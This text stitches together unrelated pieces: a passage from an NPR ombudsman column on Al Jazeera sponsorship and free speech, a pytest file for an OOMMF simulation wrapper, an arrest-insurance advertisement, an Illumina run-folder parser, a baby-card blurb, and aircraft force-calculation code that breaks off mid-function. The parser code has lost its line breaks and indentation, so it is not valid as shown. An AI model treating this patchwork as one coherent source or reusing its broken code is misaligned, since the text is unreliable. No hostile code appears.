This is because the newsroom jealously guards its independence from behind an iron wall that separates the business and news sides inside the organization, as much as some cynics do not want to believe it. This is not an issue in our newsroom or for NPR's journalists. We do not experience pressure to craft our journalism to suit the interests and desires of our sponsors. NPR receiving sponsorship support from Al Jazeera has not and will not influence our editorial decision-making regarding Al Jazeera or its financial backers. There are exceptions when a sponsorship should be mentioned in a story, such as if the story has to do with a company's advertising strategy. The Al Jazeera campaign might make for just such a story, but that is an editorial decision. As it is, no matter where one draws the line for added transparency, there will be always a fundamental element of trust: either you trust the independence of NPR's editorial process or you don't. I do, barring some good reason not to. Whether NPR should even accept the sponsorship from Al Jazeera is a separate matter of management policy that is outside my purview. But I do have a vital interest in anything that restricts free speech, and this essentially is what the complaining listeners want to do. Being a veteran myself of an earlier war, Vietnam, I am viscerally sensitive to the treatment of American soldiers by the enemy and by the news media. But this has to be balanced against the need to protect the freedoms that we fight to defend in the first place. One of the most fundamental of those freedoms is free speech, even — or especially — when it is speech we don't like. I am not one of those journalists who believe that there are almost no limits to free speech or free press. But the Al Jazeera ads and the objectionable earlier Al Jazeera coverage come nowhere near what I think any reasonable American would consider the limit, once we stop to think about it. Al Jazeera's Arabic service is not anti-American, best I can tell from former students of mine who work there and other Arabic speakers I trust. But whether the coverage is anti-American is irrelevant in our free society. Anyway, those earlier images more than anything represented a lapse in what we consider broadcast standards of decency. I disagree with running such footage, but Al Jazeera was not alone around the world and even in the U.S. in doing so. Many serious people, moreover, support showing gruesome pictures of war as a testament to a reality that we too easily forget. What is most relevant is that the network is not characterized by hate speech, according even to American diplomats and military leaders I know. Unlike some of my colleagues and free speech advocates, I draw a line on propagating or even repeating hate speech, except when reporting on the depths of the hatred or the speech itself. Defining hate speech is a judgment call, but so is so much in life. The sad truth is that much of the world is skeptical of American intentions, but this is missing in our media. The Arabic service, and another English one that is widely viewed in Europe and elsewhere, does frame world politics through a lens that is often skeptical of American intentions. The sad truth of the matter, however, is that much — and probably most — of the rest of the world shares the skepticism. So, too, do many Americans. This is in part a legacy of repeated American military interventions in developing nations, however justified each might be or have seemed. 
This understanding of how we have come to be seen in the world was a main reason that the parliament of our closest ally, Great Britain, voted against militarily punishing Syria for doing something so obviously terrible as using sarin gas on its people. Across the Muslim world, for example, internal groups that share our values oppose our interventions as counter-productive. The same is true in Latin America and other parts of the world. Yet, little of this international reality comes through in the American news media, which is largely Washington-centric or views the world as a matter of internal American political debates. We should in fact welcome that Al Jazeera might bring a more global view into our living rooms, if only to better know what others are thinking. Al Jazeera America, after one month on the air, has so far proven itself to be straightforward in its news presentation, perhaps more even than its CNN, Fox and MSNBC competitors. The network has set out to be more like the BBC or the early CNN, with lots and lots of real news. It draws on a far larger network of news bureaus across the country and around the world than the others. The most common message conveyed in Al Jazeera's coverage-that the U.S. should get involved in the conflict-was also the No. 1 message on CNN, MSNBC and Fox News. BBC News America news programming, some of which originates in London, was more of an outlier in its coverage of Syria. The sources cited most often in coverage by the U.S. cable channels-American politicians and policymakers-were also by far the most frequent in Al Jazeera America's coverage. And as was the case with CNN, Fox News and MSNBC, the overwhelming majority of Al Jazeera America's coverage originated from the two main U.S. news hubs-Washington, D.C., and New York City. The logo for the cable news network Al Jazeera America appears outside the network's studio space at the Newseum in Washington, D.C. I personally hope this doesn't mean the network, in trying to be accepted, will be too timid. This would deny us the full force of those other voices in the world. But each of us will have our own opinion of the network's framing, just as we will have our own on American policy. Will Al Jazeera America pull its punches in reporting on Qatar or causes dear to its monarchy? Maybe. It hasn't done so yet with the Syrian rebels, whom the emirate supports. Some of the network's highly respected American journalists, such as John Siegenthaler, Joie Chen and Antonio Mora, publicly assert that they will maintain their independence. The president of the network, Kate O'Brian, a former ABC News executive, has said the same. But questions of bias or independence are irrelevant when it comes to whether NPR should accept sponsorship or cable networks should carry the new network. Many news outlets have a bias. What matters is whether Al Jazeera America's falls within the acceptable boundaries of decency and free speech, and clearly it does. As it is, the trend in American journalism is toward news outlets with identifiable points of view. Fox News on the right, MSNBC on the left and Univision on common Latino issues are only the three most prominent television examples. Driving the trend are changing business models and the political fragmentation of the market into ever finer political slices by the internet and cable. Meanwhile, other international players such as the Chinese and the Russians are coming in, too. We should not be afraid of these many new voices. 
Democracy does quite well in Europe, Japan and other parts of the world where the news media has long been identified with ideological, party or individual points of view. American news networks such as CNN are present on cable channels in the rest of the world, including, specifically, Qatar. What counts for American democracy is that we uphold our free speech values and let the best ideas win in the marketplace of open debate. Updated Sept. 17 11:50 a.m. A sentence was added to clarify that the beheading aired on Al Jazeera turned out to be a hoax, according to an overview of Al Jazeera's coverage by Pew Research Center's Project for Excellence in Journalism.
import pytest


def test_oommf_sim():
    import oommf
    import os.path
    oommf.path = "/home/vagrant/oommf-python/oommf/oommf/"
    Py = oommf.materials.permalloy
    my_geometry = oommf.geometry.Cuboid(
        (0, 0, 0), (30, 30, 100), unitlength=1e-9)
    sim = oommf.Simulation(my_geometry, cellsize=5e-9, material=Py)
    sim.m = [1, 1, 0]
    assert str(sim) == 'Simulation: Py(Fe80Ni20). \n\tGeometry: Cuboid corner1 = (0, 0, 0), corner2 = (30, 30, 100). \n\t Cells = [6, 6, 20], total=720.'
    sim.advance_time(1e-9)
    assert str(sim) == 'Simulation: Py(Fe80Ni20). \n\tGeometry: Cuboid corner1 = (0, 0, 0), corner2 = (30, 30, 100). \n\t Cells = [6, 6, 20], total=720.\n\tCurrent t = 1e-09s'
    assert os.path.isfile('Simulation_0.0_1e-09.mif')
    os.system('rm Simulation_0.0_1e-09.mif')


@pytest.mark.xfail
def test_mif_assemble():
    import oommf
    import oommf.mifgen
    NiFe = oommf.materials.NiFe
    my_geometry = oommf.geometry.Cuboid(
        (0, 0, 0), (310, 310, 40), unitlength=1e-9)
    sim = oommf.Simulation(my_geometry, cellsize=5e-9, material=NiFe)
    mifpath = oommf.mifgen._assemble_mif(sim)
    f = open(mifpath, 'r')
    # The original concatenated the literal string 'oommf.oommfpath' into the
    # path; the module attribute is presumably what was intended here.
    f2 = open(oommf.oommfpath + '/app/oxs/examples/square.mif')
    constructed_miffile = f.read()
    read_miffile = f2.read()
    assert constructed_miffile == read_miffile


def test_material():
    import oommf.materials
    assert str(oommf.materials.permalloy) == 'Py(Fe80Ni20)'
    assert oommf.materials.permalloy.A == 13e-12
Being arrested or having legal proceedings taken up against you is a situation that is completely unanticipated. Defend yourself against legal problems by selecting Legal Liability Protection to defend you and your loved ones. Choosing defense through Arrest Insurance means you never have to worry about how to make it through the case. Safeguard your family and yourself with this first-rate insurance, which will help you through your trial from start to finish. Help is always on hand from our Legal Plan Underwriters and customer service team, who are always happy to assist and answer any questions you may have. Contact Legal Liability Protection at (855) 440-2245 to get started with Arrest and Legal Liability Insurance in Bryan, Texas today! Bail Bonds Bail Shop, LLC, teamed up with Legal Liability Protection, gives you fast and discreet bail service to help you with your situation. In order to continue on your job, it is important to protect yourself from the risk of litigation. In the event of a legal case, Legal Liability Protection knows that you need first-rate insurance as a safeguard. If you have questions, our Legal Plan Underwriters are always available to assist you and supply you with the answers you need. We can provide the correct coverage for your requirements, whether you are seeking professional coverage or family coverage. All of your legal needs as well as arrest insurance for Bryan, TX are available through Legal Liability Protection. When dealing with court or arrest, know your options and safeguard yourself with the Discount Legal Plan. With your legal plan, your case is automatically assigned a Criminal Defense Lawyer from our Nationwide Attorney Network who will help direct you through the difficult legal system and defend your rights. Regardless of where you may be when you need help, our first-rate defense lawyers are always available to assist you. The defense you need is available when you need it when you contact our 24-hour hotline. If you have been charged, Legal Liability Protection may even provide you with bail bonds to get you out from behind bars and back home. Our bonds services are offered to aid you no matter your situation, getting you processed and out quickly. When your time of need comes, Legal Liability Protection will give you the services you need for your protection. If you have any questions, our legal plan underwriters are always available for you. Call Legal Liability Protection today at (855) 440-2245 to chat with our Legal Plan Underwriters about your needs for arrest insurance in Bryan, TX.
import re import os import csv import xml.etree.ElementTree as ET import logging import glob from datetime import datetime from collections import OrderedDict from bs4 import BeautifulSoup #html parser class RunParser(object): """Parses an Illumina run folder. It generates data for statusdb notable attributes : :RunInfoParser runinfo: see RunInfo :RunParametersParser runparameters: see RunParametersParser :SampleSheetParser samplesheet: see SampleSheetParser :LaneBarcodeParser lanebarcodes: see LaneBarcodeParser """ def __init__(self, path): if os.path.exists(path): self.log=logging.getLogger(__name__) self.path=path self.parse() self.create_db_obj() else: raise os.error(" flowcell cannot be found at {0}".format(path)) def parse(self, demultiplexingDir='Demultiplexing'): """Tries to parse as many files as possible from a run folder""" fc_name=os.path.basename(os.path.abspath(self.path)).split('_')[-1][1:] rinfo_path=os.path.join(self.path, 'RunInfo.xml') rpar_path=os.path.join(self.path, 'runParameters.xml') ss_path=os.path.join(self.path, 'SampleSheet.csv') lb_path=os.path.join(self.path, demultiplexingDir, 'Reports', 'html', fc_name, 'all', 'all', 'all', 'laneBarcode.html') ln_path=os.path.join(self.path, demultiplexingDir, 'Reports', 'html', fc_name, 'all', 'all', 'all', 'lane.html') undeterminedStatsFolder = os.path.join(self.path, demultiplexingDir, "Stats") cycle_times_log = os.path.join(self.path, 'Logs', "CycleTimes.txt") try: self.runinfo=RunInfoParser(rinfo_path) except OSError as e: self.log.info(str(e)) self.runinfo=None try: self.runparameters=RunParametersParser(rpar_path) except OSError as e: self.log.info(str(e)) self.runParameters=None try: self.samplesheet=SampleSheetParser(ss_path) except OSError as e: self.log.info(str(e)) self.samplesheet=None try: self.lanebarcodes=LaneBarcodeParser(lb_path) except OSError as e: self.log.info(str(e)) self.lanebarcodes=None try: self.lanes=LaneBarcodeParser(ln_path) except OSError as e: self.log.info(str(e)) self.lanes=None try: self.undet=DemuxSummaryParser(undeterminedStatsFolder) except OSError as e: self.log.info(str(e)) self.undet=None try: self.time_cycles = CycleTimesParser(cycle_times_log) except OSError as e: self.log.info(str(e)) self.time_cycles = None def create_db_obj(self): self.obj={} bits=os.path.basename(os.path.abspath(self.path)).split('_') name="{0}_{1}".format(bits[0], bits[-1]) self.obj['name']=name if self.runinfo: self.obj['RunInfo']=self.runinfo.data if self.runinfo.recipe: self.obj['run_setup']=self.runinfo.recipe if self.runparameters: self.obj.update(self.runparameters.data) if self.runparameters.recipe: self.obj['run_setup']=self.runparameters.recipe if self.samplesheet: self.obj['samplesheet_csv']=self.samplesheet.data if self.lanebarcodes: self.obj['illumina']={} self.obj['illumina']['Demultiplex_Stats']={} self.obj['illumina']['Demultiplex_Stats']['Barcode_lane_statistics']=self.lanebarcodes.sample_data self.obj['illumina']['Demultiplex_Stats']['Flowcell_stats']=self.lanebarcodes.flowcell_data if self.lanes: self.obj['illumina']['Demultiplex_Stats']['Lanes_stats']=self.lanes.sample_data if self.undet: self.obj['Undetermined']=self.undet.result if self.time_cycles: self.obj['time cycles'] = self.time_cycles class DemuxSummaryParser(object): def __init__(self, path): if os.path.exists(path): self.path=path self.result={} self.TOTAL = {} self.parse() else: raise os.error("DemuxSummary folder {0} cannot be found".format(path)) def parse(self): #will only save the 50 more frequent indexes 
pattern=re.compile('DemuxSummaryF1L([0-9]).txt') for file in glob.glob(os.path.join(self.path, 'DemuxSummaryF1L?.txt')): lane_nb = pattern.search(file).group(1) self.result[lane_nb]=OrderedDict() self.TOTAL[lane_nb] = 0 with open(file, 'rU') as f: undeterminePart = False for line in f: if not undeterminePart: if "### Columns:" in line: undeterminePart = True else: #it means I am readng the index_Sequence Hit_Count components = line.rstrip().split('\t') if len(self.result[lane_nb].keys())< 50: self.result[lane_nb][components[0]] = int(components[1]) self.TOTAL[lane_nb] += int(components[1]) class LaneBarcodeParser(object): def __init__(self, path ): if os.path.exists(path): self.path=path self.parse() else: raise os.error(" laneBarcode.html cannot be found at {0}".format(path)) def parse(self): self.sample_data=[] self.flowcell_data={} with open(self.path, 'rU') as htmlfile: bsoup=BeautifulSoup(htmlfile) flowcell_table=bsoup.find_all('table')[1] lane_table=bsoup.find_all('table')[2] keys=[] values=[] for th in flowcell_table.find_all('th'): keys.append(th.text) for td in flowcell_table.find_all('td'): values.append(td.text) self.flowcell_data = dict(zip(keys, values)) keys=[] rows=lane_table.find_all('tr') for row in rows[0:]: if len(row.find_all('th')): #this is the header row for th in row.find_all('th'): key=th.text.replace('<br/>', ' ').replace('&gt;', '>') keys.append(key) elif len(row.find_all('td')): values=[] for td in row.find_all('td'): values.append(td.text) d=dict(zip(keys,values)) self.sample_data.append(d) class DemultiplexingStatsParser(object): def __init__(self, path ): if os.path.exists(path): self.path=path self.parse() else: raise os.error(" DemultiplexingStats.xml cannot be found at {0}".format(path)) def parse(self): data={} tree=ET.parse(self.path) root = tree.getroot() self.data=xml_to_dict(root) class SampleSheetParser(object): """Parses Samplesheets, with their fake csv format. Should be instancied with the samplesheet path as an argument. .header : a dict containing the info located under the [Header] section .settings : a dict containing the data from the [Settings] section .reads : a list of the values in the [Reads] section .data : a list of the values under the [Data] section. These values are stored in a dict format .datafields : a list of field names for the data section""" def __init__(self, path ): self.log=logging.getLogger(__name__) if os.path.exists(path): self.parse(path) else: raise os.error(" sample sheet cannot be found at {0}".format(path)) def generate_clean_samplesheet(self, fields_to_remove=None, rename_samples=True, rename_qPCR_suffix = False, fields_qPCR= None): """Will generate a 'clean' samplesheet, : the given fields will be removed. 
if rename_samples is True, samples prepended with 'Sample_' are renamed to match the sample name""" output="" if not fields_to_remove: fields_to_remove=[] #Header output+="[Header]{}".format(os.linesep) for field in self.header: output+="{},{}".format(field.rstrip(), self.header[field].rstrip()) output+=os.linesep #Data output+="[Data]{}".format(os.linesep) datafields=[] for field in self.datafields: if field not in fields_to_remove: datafields.append(field) output+=",".join(datafields) output+=os.linesep for line in self.data: line_ar=[] for field in datafields: value = line[field] if rename_samples and 'SampleID' in field : try: if rename_qPCR_suffix and 'SampleName' in fields_qPCR: #substitute SampleID with SampleName, add Sample_ as prefix and remove __qPCR_ suffix value =re.sub('__qPCR_$', '', 'Sample_{}'.format(line['SampleName'])) else: #substitute SampleID with SampleName, add Sample_ as prefix value ='Sample_{}'.format(line['SampleName']) except: #otherwise add Sample_ as prefix value = 'Sample_{}'.format(line['SampleID']) elif rename_qPCR_suffix and field in fields_qPCR: value = re.sub('__qPCR_$', '', line[field]) line_ar.append(value) output+=",".join(line_ar) output+=os.linesep return output def parse(self, path): flag=None header={} reads=[] settings=[] csvlines=[] data=[] flag= 'data' #in case of HiSeq samplesheet only data section is present with open(path, 'rU') as csvfile: for line in csvfile.readlines(): if '[Header]' in line: flag='HEADER' elif '[Reads]' in line: flag='READS' elif '[Settings]' in line: flag='SETTINGS' elif '[Data]' in line: flag='data' else: if flag == 'HEADER': try: header[line.split(',')[0]]=line.split(',')[1] except IndexError as e: self.log.error("file {} does not seem to be comma separated.".format(path)) raise RunTimeError("Could not parse the samplesheet, does not seem to be comma separated") elif flag == 'READS': reads.append(line.split(',')[0]) elif flag == 'SETTINGS': settings.append(line.split(',')[0]) elif flag == 'data': csvlines.append(line) reader = csv.DictReader(csvlines) for row in reader: linedict={} for field in reader.fieldnames: linedict[field]=row[field] data.append(linedict) self.datafields=reader.fieldnames self.data=data self.settings=settings self.header=header self.reads=reads class RunInfoParser(object): """Parses RunInfo.xml. Should be instancied with the file path as an argument. .data : a list of hand-picked values : -Run ID -Run Number -Instrument -Flowcell name -Run Date -Reads metadata -Flowcell layout """ def __init__(self, path ): self.data={} self.recipe=None self.path=path if os.path.exists(path): self.parse() else: raise os.error(" run info cannot be found at {0}".format(path)) def parse(self): data={} tree=ET.parse(self.path) root = tree.getroot() run=root.find('Run') data['Id']=run.get('Id') data['Number']=run.get('Number') data['Instrument']=run.find('Instrument').text data['Flowcell']=run.find('Flowcell').text data['Date']=run.find('Date').text data['Reads']=[] for read in run.find('Reads').findall('Read'): data['Reads'].append(read.attrib) layout=run.find('FlowcellLayout') data['FlowcellLayout']=layout.attrib self.data=data self.recipe=make_run_recipe(self.data.get('Reads', {})) def get_read_configuration(self): """return a list of dicts containig the Read Configuration """ readConfig = [] try: readConfig = self.data['Reads'] return sorted(readConfig, key=lambda r: int(r.get("Number", 0))) except IOError: raise RuntimeError('Reads section not present in RunInfo. 
Check the FC folder.') class RunParametersParser(object): """Parses a runParameters.xml file. This is a much more general xml parser, it will build a dict from the xml data. Attributes might be replaced if children nodes have the same tag as the attributes This does not happen in the current xml file, but if you're planning to reuse this, it may be of interest. """ def __init__(self, path ): self.data={} self.recipe=None self.path=path if os.path.exists(path): self.parse() else: raise os.error(" run parameters cannot be found at {0}".format(path)) def parse(self): data={} tree=ET.parse(self.path) root = tree.getroot() self.data=xml_to_dict(root) self.recipe=make_run_recipe(self.data.get('Setup', {}).get('Reads', {}).get('Read', {})) def make_run_recipe(reads): """Based on either runParameters of RunInfo, gathers the information as to how many readings are done and their length, e.g. 2x150""" nb_reads=0 nb_indexed_reads=0 numCycles=0 for read in reads: nb_reads+=1 if read['IsIndexedRead'] == 'Y': nb_indexed_reads+=1 else: if numCycles and numCycles != read['NumCycles']: logging.warn("NumCycles in not coherent") else: numCycles = read['NumCycles'] if reads: return "{0}x{1}".format(nb_reads-nb_indexed_reads, numCycles) return None def xml_to_dict(root): current=None children=list(root) if children: current={} duplicates={} for child in children: if len(root.findall(child.tag))>1: if child.tag not in duplicates: duplicates[child.tag]=[] lower=xml_to_dict(child) duplicates[child.tag].extend(lower.values()) current.update(duplicates) else: lower=xml_to_dict(child) current.update(lower) if root.attrib: if current: if [x in current for x in root.attrib]: current.update(root.attrib) else: current.update({'attribs':root.attribs}) else: current= root.attrib if root.text and root.text.strip() != "": if current: if 'text' not in current: current['text']=root.text else: #you're really pushing here, pal current['xml_text']=root.text else: current=root.text return {root.tag:current} class CycleTimesParser(object): def __init__(self, path): if os.path.exists(path): self.path = path self.cycles = [] self.parse() else: raise os.error("file {0} cannot be found".format(path)) def parse(self): """ parse CycleTimes.txt and return ordered list of cycles CycleTimes.txt contains records: <date> <time> <barcode> <cycle> <info> one cycle contains a few records (defined by <cycle>) parser goes over records and saves the first record of each cycle as start time and the last record of each cycle as end time """ data = [] date_format = '%m/%d/%Y-%H:%M:%S.%f' with open(self.path, 'r') as file: cycle_times = file.readlines() # if file is empty, return if not cycle_times: return # first line is header, don't read it for cycle_line in cycle_times[1:]: # split line into strings cycle_list = cycle_line.split() cycle_time_obj = {} # parse datetime cycle_time_obj['datetime'] = datetime.strptime("{date}-{time}".format(date=cycle_list[0], time=cycle_list[1]), date_format) # parse cycle number cycle_time_obj['cycle'] = int(cycle_list[3]) # add object in the list data.append(cycle_time_obj) # take the first record as current cycle current_cycle = { 'cycle_number': data[0]['cycle'], 'start': data[0]['datetime'], 'end': data[0]['datetime'] } # compare each record with current cycle (except the first one) for record in data[1:]: # if we are at the same cycle if record['cycle'] == current_cycle['cycle_number']: # override end of cycle with current record current_cycle['end'] = record['datetime'] # if a new cycle starts else: # save 
previous cycle self.cycles.append(current_cycle) # initialize new current_cycle current_cycle = { 'cycle_number': record['cycle'], 'start': record['datetime'], 'end': record['datetime'] } # the last records is not saved inside the loop if current_cycle not in self.cycles: self.cycles.append(current_cycle)
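A usage sketch of RunParser (the run-folder path is hypothetical; the parser expects RunInfo.xml, runParameters.xml, SampleSheet.csv and the Demultiplexing reports inside it, as described above):

parser = RunParser('/path/to/160809_ST-E00201_0123_AHXXXXXXX')
doc = parser.obj                 # dict assembled for statusdb
print(doc['name'])               # '160809_AHXXXXXXX' (date + flowcell part)
print(doc.get('run_setup'))      # e.g. '2x151', from RunInfo/runParameters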
Your Godson and his Wife are new parents now. Send them your congratulations on their newborn baby girl or boy with these lovely baby feet with elegant fonts on a brown and soft pink background. A sweet card to celebrate this big change in their lives.
from __future__ import print_function import numpy as np class forcecalc(object): def __init__(self): pass ##################--SETTERS--################## def setsolverparams(self, timestep, udot, vdot, wdot, pdot, qdot, rdot, steps, rho, g): # leapfrog integrator solver vars self.timestep_ = timestep self.udot_ = udot self.vdot_ = vdot self.wdot_ = wdot self.pdot_ = pdot self.qdot_ = qdot self.rdot_ = rdot # strip theory solver parameters self.steps_ = steps self.rho_ = rho self.g_ = g # set u value surface parameters def setuvals( self, U2Xvals, U2Yvals, U2Zvals, U2func): self.U2Xvals_ = U2Xvals self.U2Yvals_ = U2Yvals self.U2Zvals_ = U2Zvals self.U2func_ = U2func # set aircraft parameters def setacparams(self, m, Ixx, Iyy, Izz, proprad, fuserad, x_cg, CD0_b, dCDb_dB, dCDb_dA, alphamin, alphamax): self.m_ = m self.Ixx_ = Ixx self.Iyy_ = Iyy self.Izz_ = Izz # fuselage geometry self.proprad_ = proprad self.fuserad_ = fuserad self.x_cg_ = x_cg # fuselage drag values self.CD0_b_ = CD0_b self.dCDb_dB_ = dCDb_dB self.dCDb_dA_ = dCDb_dA # stall points self.alphamin_ = alphamin*np.pi/180 self.alphamax_ = alphamax*np.pi/180 # set wing geometry def setwingparams( self, wspan, winc, rc_w, tc_w, qtc_sweep_w, wing_root_le_x, dCL_da_w, dCL_de_w, CL0_w, CD0_w, Y_w, y_w, e_w): self.wspan_ = wspan self.winc_ = winc*np.pi/180 self.rc_w_ = rc_w self.tc_w_ = tc_w self.qtc_sweep_w_ = qtc_sweep_w*np.pi/180 self.wing_root_le_x_ = wing_root_le_x # wing lift curve slope values self.dCL_da_w_ = dCL_da_w self.dCL_de_w_ = dCL_de_w self.CL0_w_ = CL0_w self.CD0_w_ = CD0_w # wing control surface y placement (start and end)' self.Y_w_ = Y_w self.y_w_ = y_w # oswald efficiency factor wing' self.e_w_ = e_w # set horizontal tail geometry def sethtailparams( self, htspan, htinc, rc_ht, tc_ht, qtc_sweep_ht, htail_root_le_x, dCL_da_ht, dCL_de_ht, CL0_ht, CD0_ht, Y_ht, y_ht, e_ht): self.htspan_ = htspan self.htinc_ = htinc*np.pi/180 self.rc_ht_ = rc_ht self.tc_ht_ = tc_ht self.qtc_sweep_ht_ = qtc_sweep_ht*np.pi/180 self.htail_root_le_x_ = htail_root_le_x # horizontal tailplane lift-curve slope values self.dCL_da_ht_ = dCL_da_ht self.dCL_de_ht_ = dCL_de_ht self.CL0_ht_ = CL0_ht self.CD0_ht_ = CD0_ht # htail control surface y placement (start and end) self.Y_ht_ = Y_ht self.y_ht_ = y_ht # oswald efficiency factor htail self.e_ht_ = e_ht # set vertical tail geometry def setvtailparams( self, vtspan, vtinc, rc_vt, tc_vt, qtc_sweep_vt, vtail_root_le_x, dCL_da_vt, dCL_de_vt, CL0_vt, CD0_vt, Y_vt, y_vt, e_vt): self.vtspan_ = vtspan self.vtinc_ = vtinc*np.pi/180 self.rc_vt_ = rc_vt self.tc_vt_ = tc_vt self.qtc_sweep_vt_ = qtc_sweep_vt*np.pi/180 self.vtail_root_le_x_ = vtail_root_le_x # wing lift curve slope values self.dCL_da_vt_ = dCL_da_vt self.dCL_de_vt_ = dCL_de_vt self.CL0_vt_ = CL0_vt self.CD0_vt_ = CD0_vt # wing control surface y placement (start and end) self.Y_vt_ = Y_vt self.y_vt_ = y_vt # oswald efficiency factor wing self.e_vt_ = e_vt #build wing geometry def buildwing(self): span = self.wspan_ rc = self.rc_w_ tc = self.tc_w_ steps = self.steps_ rootx = self.wing_root_le_x_ self.b_w_ = span/2 self.cbar_w_ = (rc+tc)/2 self.Sref_w_ = self.cbar_w_*span self.AR_w_ = span**2/self.Sref_w_ self.w_el_ = self.b_w_/steps self.wing_ = np.linspace(self.w_el_/2, (span-self.w_el_)/2, steps) self.chord_w_ = self.chord(self.wing_, span, self.Sref_w_, rc, tc) self.le_sweep_w_ = np.arctan2((self.b_w_*np.tan(self.qtc_sweep_w_)+0.25*(rc-tc)), self.b_w_) self.x_ac_w_ = rootx+0.25*self.chord_w_+np.multiply(np.tan(self.le_sweep_w_), self.wing_) 
    # build horizontal tail geometry
    def buildhoztail(self):
        span = self.htspan_
        rc = self.rc_ht_
        tc = self.tc_ht_
        steps = self.steps_
        rootx = self.htail_root_le_x_
        self.b_ht_ = span/2
        self.cbar_ht_ = (rc+tc)/2
        self.Sref_ht_ = self.cbar_ht_*span
        self.AR_ht_ = span**2/self.Sref_ht_
        self.ht_el_ = self.b_ht_/steps
        self.htail_ = np.linspace(self.ht_el_/2, (span-self.ht_el_)/2, steps)
        self.chord_ht_ = self.chord(self.htail_, span, self.Sref_ht_, rc, tc)
        self.le_sweep_ht_ = np.arctan2(self.b_ht_*np.tan(self.qtc_sweep_ht_)+0.25*(rc-tc), self.b_ht_)
        self.x_ac_ht_ = rootx+0.25*self.chord_ht_+np.multiply(np.tan(self.le_sweep_ht_), self.htail_)

    # build vertical tail geometry
    def buildvertail(self):
        span = self.vtspan_
        rc = self.rc_vt_
        tc = self.tc_vt_
        steps = self.steps_
        rootx = self.vtail_root_le_x_
        self.cbar_vt_ = (rc+tc)/2
        self.Sref_vt_ = self.cbar_vt_*span
        self.AR_vt_ = span**2/self.Sref_vt_
        self.vt_el_ = span/steps
        self.vtail_ = np.linspace(self.vt_el_/2, (span-self.vt_el_)/2, steps)
        self.chord_vt_ = self.chord(self.vtail_, span, self.Sref_vt_, rc, tc)
        self.le_sweep_vt_ = np.arctan2(span*np.tan(self.qtc_sweep_vt_)+0.25*(rc-tc), span)
        self.x_ac_vt_ = rootx+0.25*self.chord_vt_+np.multiply(np.tan(self.le_sweep_vt_), self.vtail_)

    # build fuselage and prop geometry
    def buildfuseandprop(self):
        self.A_b_ref_ = np.pi*self.fuserad_**2
        self.diskA_ = np.pi*self.proprad_**2

    # build aircraft geometry to be used for forcecalc
    def buildgeom(self):
        self.buildwing()
        self.buildhoztail()
        self.buildvertail()
        self.buildfuseandprop()

    # calculate body forces acting on the aircraft using strip theory
    def forcecalc(self, power, u, v, w, p, q, r, aileron, elevator, rudder):
        # calc thrust force
        thrust = self.thrustcalc(power, u)
        # creating left and right wings to keep axes consistent
        lw = -np.flip(self.wing_, 0)
        rw = self.wing_
        # calc local velocity components for each strip on the wing (u,v,w)
        u_w_lw = u+lw*r
        u_w_rw = u+rw*r
        v_w = v*np.ones(np.size(rw))
        w_w_lw = w+p*lw-q*(self.x_cg_-self.x_ac_w_)
        w_w_rw = w+p*rw-q*(self.x_cg_-self.x_ac_w_)
        # calc local velocity components for each strip on the horizontal tail (u,v,w)
        lht = -np.flip(self.htail_, 0)
        rht = self.htail_
        u_ht_lht = u+lht*r
        u_ht_rht = u+rht*r
        v_ht = v-r*(self.x_cg_-self.x_ac_ht_)
        w_ht_lht = w+p*lht-q*(self.x_cg_-self.x_ac_ht_)
        w_ht_rht = w+p*rht-q*(self.x_cg_-self.x_ac_ht_)
        # calc local velocity components for each strip on the vertical tail (u,v,w)
        u_vt = u-self.vtail_*q
        v_vt = v+p*self.vtail_-r*(self.x_cg_-self.x_ac_vt_)
        w_vt = w-q*(self.x_cg_-self.x_ac_vt_)
        # calc local angles of attack for each strip on the wings, ht, vt, including incidence
        # (fixed: winc_/htinc_ are already converted to radians in the setters;
        # the original applied the deg->rad factor a second time here)
        alpha_lw = np.arctan2(w_w_lw, u_w_lw)+self.winc_
        alpha_rw = np.arctan2(w_w_rw, u_w_rw)+self.winc_
        alpha_lht = np.arctan2(w_ht_lht, u_ht_lht)+self.htinc_
        alpha_rht = np.arctan2(w_ht_rht, u_ht_rht)+self.htinc_
        alpha_vt = np.arcsin(v_vt/np.sqrt(u_vt**2+v_vt**2+w_vt**2))
        # calc local lift coefficients for each strip on the wings, ht, vt
        CL_lw = self.CL(lw, self.dCL_da_w_, alpha_lw, self.CL0_w_, -aileron,
                        self.dCL_de_w_, -self.Y_w_, -self.y_w_)
        CL_rw = self.CL(rw, self.dCL_da_w_, alpha_rw, self.CL0_w_, aileron,
                        self.dCL_de_w_, self.Y_w_, self.y_w_)
        CL_lht = self.CL(lht, self.dCL_da_ht_, alpha_lht, self.CL0_ht_, elevator,
                         self.dCL_de_ht_, self.Y_ht_, self.y_ht_)
        CL_rht = self.CL(rht, self.dCL_da_ht_, alpha_rht, self.CL0_ht_, elevator,
                         self.dCL_de_ht_, self.Y_ht_, self.y_ht_)
        CL_vt = self.CL(self.vtail_, self.dCL_da_vt_, alpha_vt, self.CL0_vt_, rudder,
                        self.dCL_de_vt_, self.Y_vt_, self.y_vt_)
        # calc local moment coefficients for each strip on the wings, ht, vt
        # CM_lw = self.CM(lw, self.dCM_da_w_, alpha_lw, self.CM0_w_, -aileron, self.dCM_de_w_, self.Y_w_, self.y_w_)
        # CM_rw = self.CM(rw, self.dCM_da_w_, alpha_rw, self.CM0_w_, aileron, self.dCM_de_w_, self.Y_w_, self.y_w_)
        # CM_lht = self.CM(lht, self.dCM_da_ht_, alpha_lht, self.CM0_ht_, elevator, self.dCM_de_ht_, self.Y_ht_, self.y_ht_)
        # CM_rht = self.CM(rht, self.dCM_da_ht_, alpha_rht, self.CM0_ht_, elevator, self.dCM_de_ht_, self.Y_ht_, self.y_ht_)
        # CM_vt = self.CM(self.vtail_, self.dCM_da_vt_, alpha_vt, self.CM0_vt_, rudder, self.dCM_de_vt_, self.Y_vt_, self.y_vt_)
        # calc constant values
        K1 = self.AR_w_*self.e_w_*np.pi
        K2 = self.AR_ht_*self.e_ht_*np.pi
        K3 = self.AR_vt_*self.e_vt_*np.pi
        # calc drag coefficients for wings, ht, vt (parabolic drag polar)
        CD_lw = self.CD0_w_+CL_lw**2/K1
        CD_rw = self.CD0_w_+CL_rw**2/K1
        CD_lht = self.CD0_ht_+CL_lht**2/K2
        CD_rht = self.CD0_ht_+CL_rht**2/K2
        CD_vt = self.CD0_vt_+CL_vt**2/K3
        # calc local velocities (squared)
        Vsq_lw = u_w_lw**2+v_w**2+w_w_lw**2
        Vsq_rw = u_w_rw**2+v_w**2+w_w_rw**2
        Vsq_lht = u_ht_lht**2+v_ht**2+w_ht_lht**2
        Vsq_rht = u_ht_rht**2+v_ht**2+w_ht_rht**2
